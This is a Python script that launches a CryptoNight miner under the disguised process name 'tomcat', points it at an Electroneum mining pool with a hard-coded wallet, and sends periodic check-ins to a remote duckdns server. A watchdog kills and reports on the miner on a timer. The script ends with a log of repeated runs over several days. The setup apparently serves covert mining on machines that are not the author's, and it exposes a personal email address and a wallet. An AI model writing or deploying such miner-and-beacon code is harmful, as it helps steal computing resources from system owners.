import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:13:07.155601
#2018-02-17 16:02:02.063410
#2018-02-17 17:48:01.256679
#2018-02-17 19:36:03.846786
#2018-02-17 21:24:01.848819
#2018-02-17 23:08:03.898311
#2018-02-18 00:55:05.751385
#2018-02-18 02:43:03.571105
#2018-02-18 04:32:01.690276
#2018-02-18 06:23:03.322875
#2018-02-18 08:11:06.621730
#2018-02-18 09:58:05.659049
#2018-02-18 11:46:05.688004
#2018-02-18 13:30:09.322163
#2018-02-18 15:20:06.435812
#2018-02-18 17:09:06.168246
#2018-02-18 18:57:01.699429
#2018-02-18 20:43:06.800298
#2018-02-18 22:28:06.162719
#2018-02-19 00:17:06.671726
#2018-02-19 02:03:07.310584
#2018-02-19 03:51:01.356771
#2018-02-19 05:35:05.630100
#2018-02-19 07:22:08.754333
#2018-02-19 09:11:07.324504
#2018-02-19 10:59:08.096930
#2018-02-19 12:47:01.354635
#2018-02-19 14:36:04.302890
#2018-02-19 16:23:05.958527
#2018-02-19 18:09:09.899415
#2018-02-19 19:57:07.894364
#2018-02-19 21:47:07.956722
#2018-02-19 23:33:04.213931
#2018-02-20 01:20:09.118162
#2018-02-20 03:11:06.284294
#2018-02-20 04:57:08.043095
#2018-02-20 06:39:01.438189
#2018-02-20 08:24:04.828822
#2018-02-20 10:09:06.587461
#2018-02-20 11:53:09.193666
#2018-02-20 13:40:09.664040
#2018-02-20 15:23:08.018248
#2018-02-20 17:09:04.000097
#2018-02-20 18:57:06.813620
#2018-02-20 20:47:04.394707
#2018-02-20 22:32:04.175444
#2018-02-21 00:13:07.287589
#2018-02-21 02:01:06.616062
#2018-02-21 03:48:05.399252
#2018-02-21 05:33:07.240974
#2018-02-21 07:22:04.215138
#2018-02-21 09:06:05.670636
#2018-02-21 10:54:06.457247
#2018-02-21 12:40:09.482920
#2018-02-21 14:29:01.338724
#2018-02-21 16:14:04.295517
#2018-02-21 18:05:01.857039
#2018-02-21 19:51:02.124334
#2018-02-21 21:39:04.479058
#2018-02-21 23:25:03.603071
#2018-02-22 01:14:06.929797
#2018-02-22 03:03:03.783766
#2018-02-22 04:48:07.321031
#2018-02-22 06:33:03.337152
#2018-02-22 08:21:01.386301
#2018-02-22 10:08:07.085343
#2018-02-22 11:53:02.208104
#2018-02-22 13:37:03.867935
#2018-02-22 15:25:08.441743
#2018-02-22 17:12:06.759542
#2018-02-22 18:57:05.132002
#2018-02-22 20:48:07.667935
#2018-02-22 22:33:05.484073
#2018-02-23 00:19:07.681447
#2018-02-23 02:08:01.202525
#2018-02-23 03:52:07.800719
#2018-02-23 05:36:08.137031
#2018-02-23 07:21:01.594781
#2018-02-23 09:25:09.268063
#2018-02-23 11:32:08.062286
#2018-02-23 13:21:08.396056
#2018-02-23 15:08:10.753008
#2018-02-23 16:57:01.764634
#2018-02-23 18:44:08.906812
#2018-02-23 20:31:06.491581
#2018-02-23 22:18:08.126099
#2018-02-24 00:04:05.066866
#2018-02-24 01:53:07.100343
#2018-02-24 03:44:06.986120
#2018-02-24 05:33:03.846315
#2018-02-24 07:19:01.831740
#2018-02-24 09:09:05.907227
#2018-02-24 10:44:04.997128
#2018-02-24 12:27:05.439036
#2018-02-24 14:07:03.835467
#2018-02-24 15:44:05.864032
#2018-02-24 17:18:03.387288
#2018-02-24 18:52:06.341676
#2018-02-24 20:24:01.252836
#2018-02-24 21:54:04.326928
#2018-02-25 00:37:05.829831
#2018-02-25 02:39:07.651887
#2018-02-25 06:15:08.444669
#2018-02-25 11:40:05.212505